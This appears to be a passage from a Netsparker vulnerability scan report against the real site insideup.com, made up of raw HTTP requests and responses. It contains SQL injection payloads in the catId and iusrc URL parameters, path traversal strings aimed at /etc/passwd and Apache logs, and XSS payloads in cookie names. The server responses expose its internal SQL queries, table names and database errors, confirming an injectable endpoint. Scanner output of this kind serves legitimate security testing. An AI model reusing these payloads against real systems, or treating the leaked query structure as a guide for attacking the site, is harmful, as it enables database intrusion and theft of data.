OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f0g3u77cjctk0d190gr5kae692; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=boqvj6hsv96bp1caprojf29gd0; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/lgds00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
